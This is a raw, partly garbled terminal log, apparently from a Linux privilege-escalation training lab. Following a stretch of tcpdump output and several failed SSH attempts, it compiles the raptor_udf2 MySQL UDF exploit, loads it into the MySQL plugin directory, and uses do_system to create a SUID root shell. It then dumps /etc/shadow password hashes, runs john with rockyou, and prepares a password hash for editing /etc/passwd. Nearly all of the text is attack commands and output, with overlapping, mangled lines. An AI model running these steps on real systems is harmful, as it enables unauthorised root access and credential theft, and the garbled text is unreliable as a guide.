177 ip-10-10-148-177.eu-west-1.compute.internal.http > ip-10-100-1-202.eu-west-1.compute.internal.49630: Flags [P.], cksum 0x7866 (incorrect -> 0x7032), seq 26694964:26747530, ack 11070, win 482, options [nop,nop,TS val 997087991 ecr 3431984530], length 52566: HTTP
17800:43:01.808500 IP (tos 0x0, ttl 64, id 24675, offset 0, flags [DF], proto TCP (6), length 52)
179 ip-10-100-1-202.eu-west-1.compute.internal.49630 > ip-10-10-148-177.eu-west-1.compute.internal.http: Flags [.], cksum 0x6fe4 (correct), seq 11070, ack 26747530, win 6091, options [nop,nop,TS val 3431984532 ecr 997087990], length 0
18000:43:01.838902 IP (tos 0x0, ttl 64, id 24676, offset 0, flags [DF], proto TCP (6), length 68)
181 ip-10-100-1-202.eu-west-1.compute.internal.49630 > ip-10-10-148-177.eu-west-1.compute.internal.http: Flags [P.], cksum 0xecc5 (correct), seq 11070:11086, ack 26747530, win 6347, options [nop,nop,TS val 3431984562 ecr 997087990], length 16: HTTP
18200:43:01.854816 IP (tos 0x0, ttl 64, id 24677, offset 0, flags [DF], proto TCP (6), length 70)
183 ip-10-100-1-202.eu-west-1.compute.internal.49630 > ip-10-10-148-177.eu-west-1.compute.internal.http: Flags [P.], cksum 0xf14c (correct), seq 11086:11104, ack 26747530, win 6347, options [nop,nop,TS val 3431984578 ecr 997087990], length 18: HTTP
18400:43:01.854940 IP (tos 0x0, ttl 64, id 24559, offset 0, flags [DF], proto TCP (6), length 52)
185 ip-10-10-148-177.eu-west-1.compute.internal.http > ip-10-100-1-202.eu-west-1.compute.internal.49630: Flags [.], cksum 0xab0f (incorrect -> 0x855d), seq 26747530, ack 11104, win 482, options [nop,nop,TS val 997088038 ecr 3431984562], length 0
18600:43:01.860901 IP (tos 0x0, ttl 64, id 24560, offset 0, flags [DF], proto TCP (6), length 62695)
187 ip-10-10-148-177.eu-west-1.compute.internal.http > ip-10-100-1-202.eu-west-1.compute.internal.49630: Flags [.], cksum 0x9fc3 (incorrect -> 0xfdf1), seq 26747530:26810173, ack 11104, win 482, options [nop,nop,TS val 997088044 ecr 3431984562], length 62643: HTTP
18800:43:01.861149 IP (tos 0x0, ttl 64, id 24567, offset 0, flags [DF], proto TCP (6), length 2896)
189 ip-10-10-148-177.eu-west-1.compute.internal.http > ip-10-100-1-202.eu-west-1.compute.internal.49630: Flags [P.], cksum 0xb62b (incorrect -> 0xe4c3), seq 26810173:26813017, ack 11104, win 482, options [nop,nop,TS val 997088044 ecr 3431984562], length 2844: HTTP
19000:43:01.861301 IP (tos 0x0, ttl 64, id 24678, offset 0, flags [DF], proto TCP (6), length 52)
191 ip-10-100-1-202.eu-west-1.compute.internal.49630 > ip-10-10-148-177.eu-west-1.compute.internal.http: Flags [.], cksum 0x9dad (correct), seq 11104, ack 26801224, win 6071, options [nop,nop,TS val 3431984584 ecr 997088044], length 0
19200:43:01.861365 IP (tos 0x0, ttl 64, id 24679, offset 0, flags [DF], proto TCP (6), length 52)
193 ip-10-100-1-202.eu-west-1.compute.internal.49630 > ip-10-10-148-177.eu-west-1.compute.internal.http: Flags [.], cksum 0x6fe0 (correct), seq 11104, ack 26813017, win 6003, options [nop,nop,TS val 3431984584 ecr 997088044], length 0
19400:43:01.862496 IP (tos 0x0, ttl 64, id 24568, offset 0, flags [DF], proto TCP (6), length 57210)
195 ip-10-10-148-177.eu-west-1.compute.internal.http > ip-10-100-1-202.eu-west-1.compute.internal.49630: Flags [P.], cksum 0x8a56 (incorrect -> 0x8614), seq 26813017:26870175, ack 11104, win 482, options [nop,nop,TS val 997088046 ecr 3431984584], length 57158: HTTP
196^Cssh user@10.10.170.166
197
198
199
200
201
202Owner@DESKTOP-8DUSIOO ~
203$ ssh user@10.10.170.166
204ssh: connect to host 10.10.170.166 port 22: Connection timed out
205
206Owner@DESKTOP-8DUSIOO ~
207$ ssh 10.10.170.166
208The authenticity of host '10.10.170.166 (10.10.170.166)' can't be esta
209blished.
210RSA key fingerprint is SHA256:JwwPVfqC+8LPQda0B9wFLZzXCXcoAho6s8wYGjkt
211Ank.
212Are you sure you want to continue connecting (yes/no)? yes
213Warning: Permanently added '10.10.170.166' (RSA) to the list of known
214Owner@DESKTOP-8DUSIOO ~
215$ ssh 10.10.170.166
216The authenticity of host '10.10.170.166 (10.10.170.166)' can't be established.
217RSA key fingerprint is SHA256:JwwPVfqC+8LPQda0B9wFLZzXCXcoAho6s8wYGjktAnk.
218Are you sure you want to continue connecting (yes/no)? yes
219Warning: Permanently added '10.10.170.166' (RSA) to the list of known hosts.
220owner@10.10.170.166's password:
221Permission denied, please try again.
222owner@10.10.170.166's password:
223Permission denied, please try again.
224owner@10.10.170.166's password:
225$ ssh 10.10.170.1666K0s
226Owner@DESKTOP-8DUSIOO ~ostname 10.10.170.166:22: No such host is known
227$ ssh 10.10.170.1666K0ssh: Could not resolve hostn
228ame 10.10.170.166:22: No such host is known.
229Owner@DESKTOP-8DUSIOO ~
230Owner@DESKTOP-8DUSIOO ~6 22
231$ 6 22
232ser@10user@10.10.170.166's passwor
233d:
234bash: 22: command not found
235Owner@DESKTOP-8DUSIOO ~
236Owner@DESKTOP-8DUSIOO ~6 22
237$ 6 220.10.170.1
23866's puser@10.10.170.166's password:
239owner@10.10.170.166's password:
240user@10.10.170.166's password:
241Owner@DESKTOP-8DUSIOO ~ound
242$ ssh 10.10.Ku
243Owner@DESKTOP- ~
244Owner@DESKTOP-8DUSIOO ~
245$ ssh user@10.10.170.166 22
246user@10.10.170.166's password:
247bash: 22: command not found
248bash: 22: command not found
249Owner@DESKTOP-8DUSIOO ~
250$ ssh user@10.10.170.166
251$ 6 22 [-E log_file] user@10.10.170.166's configfile] [-I pkcs11]
252password:
253Linux debian 2.6.32-5-amd64 #1 SMP Tue May 13 16:34:35 UTC 2014 x86_64
254
255The programs included with the Debian GNU/Linux system are free software;
256the exact distribution terms for each program are described in the
257individual files in /usr/share/doc/*/copyright.
258
259Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
260permitted by applicable law.
261Last login: Fri May 15 06:41:23 2020 from 192.168.1.125
262user@debian:~$ id
263uid=1000(user) gid=1000(user) groups=1000(user),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plug
264dev)
265user@debian:~$ ls
266myvpn.ovpn tools
267user@debian:~$ cd tools/
268user@debian:~/tools$ ls
269kernel-exploits mysql-udf nginx privesc-scripts sudo suid
270user@debian:~/tools$ cd mysql-udf/
271user@debian:~/tools/mysql-udf$ ls
272raptor_udf2.c
273user@debian:~/tools/mysql-udf$ gcc -g -c raptor_udf2.c -fPIC
274user@debian:~/tools/mysql-udf$ gcc -g -shared -W1, -soname, raptor_udf2.so -o raptor_udf2.so raptor_udf2
275.o -lc
276top - 20:04:48 up 11 min, 1 user, load average: 0.00, 0.07, 0.08
277Tasks: 83 total, 1 running, 82 sleeping, 0 stopped, 0 zombie
278Cpu(s): 0.0%us, 0.0%sy, 0.0%ni,100.0%id, 0.0%wa, 0.0%hi, 0.0%si, 0.0%st
279Mem: 507168k total, 498240k used, 8928k free, 382220k buffers
280Swap: 901112k total, 0k used, 901112k free, 54236k cached
281
282 PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND
283 1 root 20 0 8396 812 680 S 0.0 0.2 0:01.06 init
284 2 root 20 0 0 0 0 S 0.0 0.0 0:00.00 kthreadd
285 3 root RT 0 0 0 0 S 0.0 0.0 0:00.00 migration/0
286 4 root 20 0 0 0 0 S 0.0 0.0 0:00.00 ksoftirqd/0
287 5 root RT 0 0 0 0 S 0.0 0.0 0:00.00 watchdog/0
288 6 root 20 0 0 0 0 S 0.0 0.0 0:00.01 events/0
289 7 root 20 0 0 0 0 S 0.0 0.0 0:00.00 cpuset
290 8 root 20 0 0 0 0 S 0.0 0.0 0:00.00 khelper
291 9 root 20 0 0 0 0 S 0.0 0.0 0:00.00 netns
292 10 root 20 0 0 0 0 S 0.0 0.0 0:00.00 async/mgr
293 11 root 20 0 0 0 0 S 0.0 0.0 0:00.00 pm
294 12 root 20 0 0 0 0 S 0.0 0.0 0:00.00 xenwatch
295 13 root 20 0 0 0 0 S 0.0 0.0 0:00.00 xenbus
296 14 root 20 0 0 0 0 S 0.0 0.0 0:00.00 sync_supers
297 15 root 20 0 0 0 0 S 0.0 0.0 0:00.00 bdi-default
298 16 root 20 0 0 0 0 S 0.0 0.0 0:00.00 kintegrityd/0
299 17 root 20 0 0 0 0 S 0.0 0.0 0:00.00 kblockd/0
300 18 root 20 0 0 0 0 S 0.0 0.0 0:00.00 kacpid
301 19 root 20 0 0 0 0 S 0.0 0.0 0:00.00 kacpi_notify
302 20 root 20 0 0 0 0 S 0.0 0.0 0:00.00 kacpi_hotplug
303 21 root 20 0 0 0 0 S 0.0 0.0 0:00.06 kseriod
304 23 root 20 0 0 0 0 S 0.0 0.0 0:00.00 kondemand/0
305 24 root 20 0 0 0 0 S 0.0 0.0 0:00.00 khungtaskd
306 25 root 20 0 0 0 0 S 0.0 0.0 0:00.00 kswapd0
307 26 root 25 5 0 0 0 S 0.0 0.0 0:00.00 ksmd
308 27 root 20 0 0 0 0 S 0.0 0.0 0:00.00 aio/0
309 28 root 20 0 0 0 0 S 0.0 0.0 0:00.00 crypto/0
310 165 root 20 0 0 0 0 S 0.0 0.0 0:00.00 ata/0
311 166 root 20 0 0 0 0 S 0.0 0.0 0:00.00 ata_aux
312 167 root 20 0 0 0 0 S 0.0 0.0 0:00.00 scsi_eh_0
313 168 root 20 0 0 0 0 S 0.0 0.0 0:00.01 scsi_eh_1
314 198 root 20 0 0 0 0 S 0.0 0.0 0:00.00 kjournald
315 240 root 20 0 0 0 0 S 0.0 0.0 0:00.00 flush-202:0
316 275 root 16 -4 16784 796 380 S 0.0 0.2 0:00.34 udevd
317 425 root 20 0 0 0 0 S 0.0 0.0 0:00.00 kpsmoused
318 932 root 18 -2 16780 720 308 S 0.0 0.1 0:00.00 udevd
319 933 root 18 -2 16780 648 236 S 0.0 0.1 0:00.00 udevd
320 1249 root 20 0 6796 756 284 S 0.0 0.1 0:00.03 dhclient
321 1279 daemon 20 0 8136 532 408 S 0.0 0.1 0:00.00 portmap
322 1311 statd 20 0 14424 896 732 S 0.0 0.2 0:00.00 rpc.statd
323 1314 root 20 0 0 0 0 S 0.0 0.0 0:00.00 rpciod/0
324 1316 root 15 -5 0 0 0 S 0.0 0.0 0:00.00 kslowd000
325 1317 root 15 -5 0 0 0 S 0.0 0.0 0:00.00 kslowd001
326 1318 root 20 0 0 0 0 S 0.0 0.0 0:00.00 nfsiod
327 1325 root 20 0 27064 588 372 S 0.0 0.1 0:00.00 rpc.idmapd
328 1562 root 20 0 54336 1656 1084 S 0.0 0.3 0:00.08 rsyslogd
329 1638 root 20 0 3960 644 504 S 0.0 0.1 0:00.00 acpid
330 1672 root 20 0 71424 2896 1476 S 0.0 0.6 0:00.01 apache2
331 1675 www-data 20 0 71156 1992 596 S 0.0 0.4 0:00.00 apache2
332 1676 www-data 20 0 287m 2628 984 S 0.0 0.5 0:00.00 apache2
333 1677 www-data 20 0 287m 2644 996 S 0.0 0.5 0:00.00 apache2
334 1818 root 20 0 22468 1068 824 S 0.0 0.2 0:00.00 cron
335user@debian:~/tools/mysql-udf$ use mysql;
336-bash: use: command not found
337user@debian:~/tools/mysql-udf$ mysql -u root
338Welcome to the MySQL monitor. Commands end with ; or \g.
339Your MySQL connection id is 36
340Server version: 5.1.73-1+deb6u1 (Debian)
341
342Copyright (c) 2000, 2013, Oracle and/or its affiliates. All rights reserved.
343
344Oracle is a registered trademark of Oracle Corporation and/or its
345affiliates. Other names may be trademarks of their respective
346owners.
347
348Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
349
350mysql> use mysql;
351Reading table information for completion of table and column names
352You can turn off this feature to get a quicker startup with -A
353
354Database changed
355mysql> create table foo(line blob);
356Query OK, 0 rows affected (0.00 sec)
357
358mysql> insert into foo values(load_file('/home/user/tools/mysql-udf/raptor_udf2.so'));
359Query OK, 1 row affected (0.00 sec)
360
361mysql> select * from foo into dumpfile '/usr/lib/mysql/plugin/raptor_udf2.so';
362Query OK, 1 row affected (0.00 sec)
363
364mysql> create function do_system returns integer soname 'raptor_udf2.so';
365Query OK, 0 rows affected (0.00 sec)
366
367mysql> select do_system('cp /bin/bash /tmp/rootbash; chmod +xs /tmp/rootbash');
368+------------------------------------------------------------------+
369| do_system('cp /bin/bash /tmp/rootbash; chmod +xs /tmp/rootbash') |
370+------------------------------------------------------------------+
371| 0 |
372+------------------------------------------------------------------+
3731 row in set (0.00 sec)
374
375mysql> /q
376 -> exit
377 -> /quit
378 -> ^CCtrl-C -- exit!
379Aborted
380user@debian:~/tools/mysql-udf$ /tmp/rootbash -p
381rootbash-4.1# id
382uid=1000(user) gid=1000(user) euid=0(root) egid=0(root) groups=0(root),24(cdrom),25(floppy),29(audio),30
383(dip),44(video),46(plugdev),1000(user)
384rootbash-4.1# cat /etc/shadow
385root:$6$Tb/euwmK$OXA.dwMeOAcopwBl68boTG5zi65wIHsc84OWAIye5VITLLtVlaXvRDJXET..it8r.jbrlpfZeMdwD3B0fGxJI0:
38617298:0:99999:7:::
387daemon:*:17298:0:99999:7:::
388bin:*:17298:0:99999:7:::
389sys:*:17298:0:99999:7:::
390sync:*:17298:0:99999:7:::
391games:*:17298:0:99999:7:::
392man:*:17298:0:99999:7:::
393lp:*:17298:0:99999:7:::
394mail:*:17298:0:99999:7:::
395news:*:17298:0:99999:7:::
396uucp:*:17298:0:99999:7:::
397proxy:*:17298:0:99999:7:::
398www-data:*:17298:0:99999:7:::
399backup:*:17298:0:99999:7:::
400list:*:17298:0:99999:7:::
401irc:*:17298:0:99999:7:::
402gnats:*:17298:0:99999:7:::
403nobody:*:17298:0:99999:7:::
404libuuid:!:17298:0:99999:7:::
405Debian-exim:!:17298:0:99999:7:::
406sshd:*:17298:0:99999:7:::
407user:$6$M1tQjkeb$M1A/ArH4JeyF1zBJPLQ.TZQR1locUlz0wIZsoY6aDOZRFrYirKDW5IJy32FBGjwYpT2O1zrR2xTROv7wRIkF8.:
40817298:0:99999:7:::
409statd:*:17299:0:99999:7:::
410mysql:!:18133:0:99999:7:::
411rootbash-4.1# cat /etc/passwd
412root:x:0:0:root:/root:/bin/bash
413daemon:x:1:1:daemon:/usr/sbin:/bin/sh
414bin:x:2:2:bin:/bin:/bin/sh
415sys:x:3:3:sys:/dev:/bin/sh
416sync:x:4:65534:sync:/bin:/bin/sync
417games:x:5:60:games:/usr/games:/bin/sh
418man:x:6:12:man:/var/cache/man:/bin/sh
419lp:x:7:7:lp:/var/spool/lpd:/bin/sh
420mail:x:8:8:mail:/var/mail:/bin/sh
421news:x:9:9:news:/var/spool/news:/bin/sh
422uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
423proxy:x:13:13:proxy:/bin:/bin/sh
424www-data:x:33:33:www-data:/var/www:/bin/sh
425backup:x:34:34:backup:/var/backups:/bin/sh
426list:x:38:38:Mailing List Manager:/var/list:/bin/sh
427irc:x:39:39:ircd:/var/run/ircd:/bin/sh
428gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
429nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
430libuuid:x:100:101::/var/lib/libuuid:/bin/sh
431Debian-exim:x:101:103::/var/spool/exim4:/bin/false
432sshd:x:102:65534::/var/run/sshd:/usr/sbin/nologin
433user:x:1000:1000:user,,,:/home/user:/bin/bash
434statd:x:103:65534::/var/lib/nfs:/bin/false
435mysql:x:104:106:MySQL Server,,,:/var/lib/mysql:/bin/false
436rootbash-4.1# cat /etc/hosts
437127.0.0.1 localhost
438127.0.1.1 debian.localdomain debian
439
440# The following lines are desirable for IPv6 capable hosts
441::1 ip6-localhost ip6-loopback
442fe00::0 ip6-localnet
443ff00::0 ip6-mcastprefix
444ff02::1 ip6-allnodes
445ff02::2 ip6-allrouters
446rootbash-4.1# ls -l /etc/shadow
447-rw-r--rw- 1 root shadow 837 Aug 25 2019 /etc/shadow
448rootbash-4.1# cat /etc/shadow
449root:$6$Tb/euwmK$OXA.dwMeOAcopwBl68boTG5zi65wIHsc84OWAIye5VITLLtVlaXvRDJXET..it8r.jbrlpfZeMdwD3B0fGxJI0:
45017298:0:99999:7:::
451daemon:*:17298:0:99999:7:::
452bin:*:17298:0:99999:7:::
453sys:*:17298:0:99999:7:::
454sync:*:17298:0:99999:7:::
455games:*:17298:0:99999:7:::
456man:*:17298:0:99999:7:::
457lp:*:17298:0:99999:7:::
458mail:*:17298:0:99999:7:::
459news:*:17298:0:99999:7:::
460uucp:*:17298:0:99999:7:::
461proxy:*:17298:0:99999:7:::
462www-data:*:17298:0:99999:7:::
463backup:*:17298:0:99999:7:::
464list:*:17298:0:99999:7:::
465irc:*:17298:0:99999:7:::
466gnats:*:17298:0:99999:7:::
467nobody:*:17298:0:99999:7:::
468libuuid:!:17298:0:99999:7:::
469Debian-exim:!:17298:0:99999:7:::
470sshd:*:17298:0:99999:7:::
471user:$6$M1tQjkeb$M1A/ArH4JeyF1zBJPLQ.TZQR1locUlz0wIZsoY6aDOZRFrYirKDW5IJy32FBGjwYpT2O1zrR2xTROv7wRIkF8.:
47217298:0:99999:7:::
473statd:*:17299:0:99999:7:::
474mysql:!:18133:0:99999:7:::
475rootbash-4.1# wget
476wget: missing URL
477Usage: wget [OPTION]... [URL]...
478
479Try ‘wget --help’ for more options.
480rootbash-4.1# pwd
481/home/user/tools/mysql-udf
482rootbash-4.1# ls
483raptor_udf2.c raptor_udf2.o raptor_udf2.so
484rootbash-4.1# cd ..
485rootbash-4.1# ls
486kernel-exploits mysql-udf nginx privesc-scripts sudo suid
487rootbash-4.1# cd ..
488rootbash-4.1# ls
489myvpn.ovpn tools
490rootbash-4.1# cd tools/
491rootbash-4.1# ls
492kernel-exploits mysql-udf nginx privesc-scripts sudo suid
493rootbash-4.1# cd privesc-scripts/
494rootbash-4.1# ls
495LinEnum.sh linpeas.sh lse.sh
496rootbash-4.1# john --wordlist =/usr/share/wordlists/rockyou.txt hash.txt
497login as: user
498user@10.10.170.166's password:
499Linux debian 2.6.32-5-amd64 #1 SMP Tue May 13 16:34:35 UTC 2014 x86_64
500
501The programs included with the Debian GNU/Linux system are free software;
502the exact distribution terms for each program are described in the
503individual files in /usr/share/doc/*/copyright.
504
505Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
506permitted by applicable law.
507Last login: Sun Jan 17 21:12:02 2021 from ip-10-9-252-16.eu-west-1.compute.inter nal
508user@debian:~$ cd /home/user/tools/mysql.udf
509-bash: cd: /home/user/tools/mysql.udf: No such file or directory
510user@debian:~$ ls
511myvpn.ovpn tools
512user@debian:~$ cd tools/
513user@debian:~/tools$ ls
514kernel-exploits mysql-udf nginx privesc-scripts sudo suid
515user@debian:~/tools$ gcc -g -c raptor_udf2.c -fPIC
516gcc: raptor_udf2.c: No such file or directory
517gcc: no input files
518user@debian:~/tools$ cd mysql-udf/
519user@debian:~/tools/mysql-udf$ gcc -g -c raptor_udf2.c -fPIC
520user@debian:~/tools/mysql-udf$ gcc -g -shared -W1, -soname, raptor_udf2.so -o re aptor_udf2.so raptor_udf2.o -1c
521gcc: unrecognized option '-soname,'
522gcc: unrecognized option '-1c'
523user@debian:~/tools/mysql-udf$ gcc -g -shared -W1, -soname, raptor_udf2.so -o re aptor_udf2.so raptor_udf2.o -lc
524gcc: unrecognized option '-soname,'
525user@debian:~/tools/mysql-udf$ gcc -g -shared -Wl,-soname,raptor_udf2.so -o rapt or_udf2.so raptor_udf2.o -lc
526user@debian:~/tools/mysql-udf$ mysql -u root
527Welcome to the MySQL monitor. Commands end with ; or \g.
528Your MySQL connection id is 37
529Server version: 5.1.73-1+deb6u1 (Debian)
530
531Copyright (c) 2000, 2013, Oracle and/or its affiliates. All rights reserved.
532
533Oracle is a registered trademark of Oracle Corporation and/or its
534affiliates. Other names may be trademarks of their respective
535owners.
536
537Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
538
539mysql> use mysql;
540Reading table information for completion of table and column names
541You can turn off this feature to get a quicker startup with -A
542
543Database changed
544mysql> create table bmillakid(line blob);
545Query OK, 0 rows affected (0.00 sec)
546
547mysql> insert into bmillakid values(load_file('home/usr/tools/mysql-udf/raptor_u df2.so' ));
548Query OK, 1 row affected (0.00 sec)
549
550mysql> select * from bmillakid into dumpfile '/usr/lib/mysql/plugin/raptor_udf2. so';
551ERROR 1086 (HY000): File '/usr/lib/mysql/plugin/raptor_udf2.so' already exists
552mysql> exit
553Bye
554user@debian:~/tools/mysql-udf$ who am i
555user pts/0 2021-01-17 21:14 (ip-10-9-252-16.eu-west-1.compute.interna l)
556user@debian:~/tools/mysql-udf$ links
557-bash: links: command not found
558user@debian:~/tools/mysql-udf$ lynx
559-bash: lynx: command not found
560user@debian:~/tools/mysql-udf$ wget
561wget: missing URL
562Usage: wget [OPTION]... [URL]...
563
564Try ‘wget --help’ for more options.
565user@debian:~/tools/mysql-udf$ cat /etc/shadow
566root:$6$Tb/euwmK$OXA.dwMeOAcopwBl68boTG5zi65wIHsc84OWAIye5VITLLtVlaXvRDJXET..it8 r.jbrlpfZeMdwD3B0fGxJI0:17298:0:99999:7:::
567daemon:*:17298:0:99999:7:::
568bin:*:17298:0:99999:7:::
569sys:*:17298:0:99999:7:::
570sync:*:17298:0:99999:7:::
571games:*:17298:0:99999:7:::
572man:*:17298:0:99999:7:::
573lp:*:17298:0:99999:7:::
574mail:*:17298:0:99999:7:::
575news:*:17298:0:99999:7:::
576uucp:*:17298:0:99999:7:::
577proxy:*:17298:0:99999:7:::
578www-data:*:17298:0:99999:7:::
579backup:*:17298:0:99999:7:::
580list:*:17298:0:99999:7:::
581irc:*:17298:0:99999:7:::
582gnats:*:17298:0:99999:7:::
583nobody:*:17298:0:99999:7:::
584libuuid:!:17298:0:99999:7:::
585Debian-exim:!:17298:0:99999:7:::
586sshd:*:17298:0:99999:7:::
587user:$6$M1tQjkeb$M1A/ArH4JeyF1zBJPLQ.TZQR1locUlz0wIZsoY6aDOZRFrYirKDW5IJy32FBGjw YpT2O1zrR2xTROv7wRIkF8.:17298:0:99999:7:::
588statd:*:17299:0:99999:7:::
589mysql:!:18133:0:99999:7:::
590bmillakid:!:18645:0:99999:7:::
591user@debian:~/tools/mysql-udf$ cat /etc/passwd
592root:x:0:0:root:/root:/bin/bash
593daemon:x:1:1:daemon:/usr/sbin:/bin/sh
594bin:x:2:2:bin:/bin:/bin/sh
595sys:x:3:3:sys:/dev:/bin/sh
596sync:x:4:65534:sync:/bin:/bin/sync
597games:x:5:60:games:/usr/games:/bin/sh
598man:x:6:12:man:/var/cache/man:/bin/sh
599lp:x:7:7:lp:/var/spool/lpd:/bin/sh
600mail:x:8:8:mail:/var/mail:/bin/sh
601news:x:9:9:news:/var/spool/news:/bin/sh
602uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
603proxy:x:13:13:proxy:/bin:/bin/sh
604www-data:x:33:33:www-data:/var/www:/bin/sh
605backup:x:34:34:backup:/var/backups:/bin/sh
606list:x:38:38:Mailing List Manager:/var/list:/bin/sh
607irc:x:39:39:ircd:/var/run/ircd:/bin/sh
608gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
609nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
610libuuid:x:100:101::/var/lib/libuuid:/bin/sh
611Debian-exim:x:101:103::/var/spool/exim4:/bin/false
612sshd:x:102:65534::/var/run/sshd:/usr/sbin/nologin
613user:x:1000:1000:user,,,:/home/user:/bin/bash
614statd:x:103:65534::/var/lib/nfs:/bin/false
615mysql:x:104:106:MySQL Server,,,:/var/lib/mysql:/bin/false
616bmillakid:x:1001:1001::/home/bmillakid:/bin/sh
617user@debian:~/tools/mysql-udf$ ls -la user
618ls: cannot access user: No such file or directory
619user@debian:~/tools/mysql-udf$ pwd
620/home/user/tools/mysql-udf
621user@debian:~/tools/mysql-udf$ who am i
622user pts/0 2021-01-17 21:14 (ip-10-9-252-16.eu-west-1.compute.interna l)
623user@debian:~/tools/mysql-udf$ whoami
624user
625user@debian:~/tools/mysql-udf$ ls -la /
626total 96
627drwxr-xr-x 22 root root 4096 Aug 25 2019 .
628drwxr-xr-x 22 root root 4096 Aug 25 2019 ..
629drwxr-xr-x 2 root root 4096 Aug 25 2019 bin
630drwxr-xr-x 3 root root 4096 May 12 2017 boot
631drwxr-xr-x 12 root root 2820 Jan 17 19:55 dev
632drwxr-xr-x 67 root root 4096 Jan 17 21:16 etc
633drwxr-xr-x 3 root root 4096 May 15 2017 home
634lrwxrwxrwx 1 root root 30 May 12 2017 initrd.img -> boot/initrd.img-2.6.32- 5-amd64
635drwxr-xr-x 12 root root 12288 May 14 2017 lib
636lrwxrwxrwx 1 root root 4 May 12 2017 lib64 -> /lib
637drwx------ 2 root root 16384 May 12 2017 lost+found
638drwxr-xr-x 3 root root 4096 May 12 2017 media
639drwxr-xr-x 2 root root 4096 Jun 11 2014 mnt
640drwxr-xr-x 2 root root 4096 May 12 2017 opt
641dr-xr-xr-x 96 root root 0 Jan 17 19:53 proc
642drwx------ 5 root root 4096 May 15 2020 root
643drwxr-xr-x 2 root root 4096 May 13 2017 sbin
644drwxr-xr-x 2 root root 4096 Jul 21 2010 selinux
645drwxr-xr-x 2 root root 4096 May 12 2017 srv
646drwxr-xr-x 2 root root 4096 Aug 25 2019 .ssh
647drwxr-xr-x 13 root root 0 Jan 17 19:53 sys
648drwxrwxrwt 2 root root 4096 Jan 17 21:19 tmp
649drwxr-xr-x 11 root root 4096 May 13 2017 usr
650drwxr-xr-x 14 root root 4096 May 13 2017 var
651lrwxrwxrwx 1 root root 27 May 12 2017 vmlinuz -> boot/vmlinuz-2.6.32-5-amd6 4
652user@debian:~/tools/mysql-udf$ whoami
653user
654user@debian:~/tools/mysql-udf$ sudo -l
655Matching Defaults entries for user on this host:
656 env_reset, env_keep+=LD_PRELOAD, env_keep+=LD_LIBRARY_PATH
657
658User user may run the following commands on this host:
659 (root) NOPASSWD: /usr/sbin/iftop
660 (root) NOPASSWD: /usr/bin/find
661 (root) NOPASSWD: /usr/bin/nano
662 (root) NOPASSWD: /usr/bin/vim
663 (root) NOPASSWD: /usr/bin/man
664 (root) NOPASSWD: /usr/bin/awk
665 (root) NOPASSWD: /usr/bin/less
666 (root) NOPASSWD: /usr/bin/ftp
667 (root) NOPASSWD: /usr/bin/nmap
668 (root) NOPASSWD: /usr/sbin/apache2
669 (root) NOPASSWD: /bin/more
670user@debian:~/tools/mysql-udf$ cat /etc/shadow | grep root
671root:$6$Tb/euwmK$OXA.dwMeOAcopwBl68boTG5zi65wIHsc84OWAIye5VITLLtVlaXvRDJXET..it8 r.jbrlpfZeMdwD3B0fGxJI0:17298:0:99999:7:::
672user@debian:~/tools/mysql-udf$ ls -l /etc/passwd
673-rw-r--r-- 1 root root 1056 Jan 17 20:33 /etc/passwd
674user@debian:~/tools/mysql-udf$ openssl passwd l33th4x0rbr0!
675Warning: truncating password to 8 characters
6765v3Bvw7Nf6Zbs
677user@debian:~/tools/mysql-udf$
678user@debian:~/tools/mysql-udf$ 5v3Bvw7Nf6Zbs
679-bash: 5v3Bvw7Nf6Zbs: command not found
680user@debian:~/tools/mysql-udf$ nano /etc/passwd
681user@debian:~/tools/mysql-udf$ /tmp/rootbash -p
682rootbash-4.1# su newroot
683Unknown id: newroot
684rootbash-4.1# whoami
685root
686rootbash-4.1# cat /etc/passwd
687root:x:0:0:root:/root:/bin/bash
688daemon:x:1:1:daemon:/usr/sbin:/bin/sh
689bin:x:2:2:bin:/bin:/bin/sh
690sys:x:3:3:sys:/dev:/bin/sh
691sync:x:4:65534:sync:/bin:/bin/sync
692games:x:5:60:games:/usr/games:/bin/sh
693man:x:6:12:man:/var/cache/man:/bin/sh
694lp:x:7:7:lp:/var/spool/lpd:/bin/sh
695mail:x:8:8:mail:/var/mail:/bin/sh
696news:x:9:9:news:/var/spool/news:/bin/sh
697uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
698proxy:x:13:13:proxy:/bin:/bin/sh
699www-data:x:33:33:www-data:/var/www:/bin/sh
700backup:x:34:34:backup:/var/backups:/bin/sh
701list:x:38:38:Mailing List Manager:/var/list:/bin/sh
702irc:x:39:39:ircd:/var/run/ircd:/bin/sh
703gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
704nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
705libuuid:x:100:101::/var/lib/libuuid:/bin/sh
706Debian-exim:x:101:103::/var/spool/exim4:/bin/false
707sshd:x:102:65534::/var/run/sshd:/usr/sbin/nologin
708user:x:1000:1000:user,,,:/home/user:/bin/bash
709statd:x:103:65534::/var/lib/nfs:/bin/false
710mysql:x:104:106:MySQL Server,,,:/var/lib/mysql:/bin/false
711bmillakid:x:1001:1001::/home/bmillakid:/bin/sh
712rootbash-4.1# su root
713Password:
714su: Authentication failure
715rootbash-4.1# exit
716exit
717user@debian:~/tools/mysql-udf$ sudo -l
718Matching Defaults entries for user on this host:
719 env_reset, env_keep+=LD_PRELOAD, env_keep+=LD_LIBRARY_PATH
720
721User user may run the following commands on this host:
722 (root) NOPASSWD: /usr/sbin/iftop
723 (root) NOPASSWD: /usr/bin/find
724 (root) NOPASSWD: /usr/bin/nano
725 (root) NOPASSWD: /usr/bin/vim
726 (root) NOPASSWD: /usr/bin/man
727 (root) NOPASSWD: /usr/bin/awk
728 (root) NOPASSWD: /usr/bin/less
729 (root) NOPASSWD: /usr/bin/ftp
730 (root) NOPASSWD: /usr/bin/nmap
731 (root) NOPASSWD: /usr/sbin/apache2
732 (root) NOPASSWD: /bin/more
